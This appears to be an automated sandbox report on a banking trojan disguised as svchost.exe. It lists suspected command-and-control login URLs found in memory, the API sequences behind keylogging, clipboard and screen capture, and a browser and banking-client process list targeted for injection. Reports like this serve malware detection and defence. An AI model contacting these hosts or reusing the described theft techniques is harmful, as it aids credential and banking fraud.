Source: svchost.exe, 00000002.00000003.1820476887.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1825691340.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1821880893.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547049612.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549695990.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzot.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142459408.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615554415.0000000002F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzyk.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowybof.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowybyc.com/0
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576507810.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048442631.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowybyc.com/login.php
Source: svchost.exe, 00000002.00000003.1587051265.0000000008B72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1588374175.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowycok.com/H

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\apppatch\svchost.exe Code function: [tab] 2_2_02652F40
Source: C:\Windows\apppatch\svchost.exe Code function: [del] 2_2_02652F40
Source: C:\Windows\apppatch\svchost.exe Code function: [ins] 2_2_02652F40
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02653220 memset,GlobalLock,GetCurrentThreadId,GetGUIThreadInfo,GetOpenClipboardWindow,GetActiveWindow,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GlobalUnlock,GlobalUnlock, 2_2_02653220
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02649530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard, 2_2_02649530
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: 5_2_01329530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard, 5_2_01329530
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: 6_2_013E9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard, 6_2_013E9530
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: 8_2_01519530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_01519530
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_026654A0 Sleep,_snprintf,GetDesktopWindow,GetWindowDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,SelectObject,BitBlt,GetDesktopWindow,GetDC,GetProcessHeap,HeapAlloc,memset,GetDIBits,GetDIBits,ReleaseDC, 2_2_026654A0
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02652F40 memset,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapValidate,GetProcessHeap,HeapReAlloc,GetKeyboardState,ToAscii, 2_2_02652F40

E-Banking Fraud

Source: C:\Windows\apppatch\svchost.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 2_2_026578A0
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandl
eA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe2_2_02656CA0
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandl
eA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe2_2_02656CA0
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandl
eA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe2_2_02656CA0
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandl
eA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe2_2_02656CA0
Source: C:\Windows\apppatch\svchost.exe Code function: GetCommandLineA,StrStrIA,memset,IsUserAnAdmin,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe 2_2_02651900
Source: C:\Windows\apppatch\svchost.exe Code function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 2_2_02643610
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 5_2_013378A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_01336CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe5_2_01336CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe5_2_01336CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe5_2_01336CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe5_2_01331900
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_01323610
